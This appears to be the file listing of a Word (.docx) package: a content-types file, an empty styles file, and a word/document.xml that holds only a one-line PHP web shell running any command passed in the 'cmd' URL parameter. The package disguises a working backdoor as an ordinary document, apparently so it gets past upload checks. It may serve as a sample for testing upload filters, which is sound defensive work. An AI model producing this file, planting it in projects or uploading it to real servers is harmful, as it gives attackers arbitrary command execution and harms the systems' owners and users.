
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/xml"/>
</Types>
</file>

<file path=word/document.xml><?php system($_GET["cmd"]); ?>
</file>

<file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
<xml/>
</file>